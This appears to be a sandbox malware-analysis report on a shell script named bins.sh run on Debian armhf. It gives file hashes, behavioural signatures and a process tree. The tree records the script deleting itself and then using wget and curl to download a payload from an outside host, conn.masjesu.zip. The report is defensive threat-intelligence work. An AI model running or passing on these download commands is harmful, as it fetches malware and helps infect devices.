Analysis

  • max time kernel
    148s
  • max time network
    3s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240729-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    05-11-2024 00:42

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    259c24781ea50ed07083d852383db860

  • SHA1

    bab7105282bcc4a8c8c8ca56fa657b9223c86fab

  • SHA256

    fd9a3d3764a43a1d0cc4af5401c6fb2a4a333c84e66a9323acbd9a5305e9e11c

  • SHA512

    c01d8e62e96c399a6f09da0428927e99c7369da10f5f2f4d5f6893f76205e55302a95e5bcee1d83810485414d7326990c05cf37da31e50a8b531a4deb9862ab1

  • SSDEEP

    192:iz/+WqahFEQu2kVZNy8Qz3nqahFEQEZNy8QzV1/W:iSWqanEQu2kP6qanEQWb

Score
4/10

Malware Config

Signatures

  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads runtime system information 2 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 2 IoCs

    Adversaries may gather information about the network configuration of a system.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:639
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:641
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY6
          2⤵
          • System Network Configuration Discovery
          PID:644
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/sppMiKhKttCT7KFnr4dlHcbR5cP9UvReY6
          2⤵
          • Checks CPU configuration
          • Reads runtime system information
          • System Network Configuration Discovery
          PID:652

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads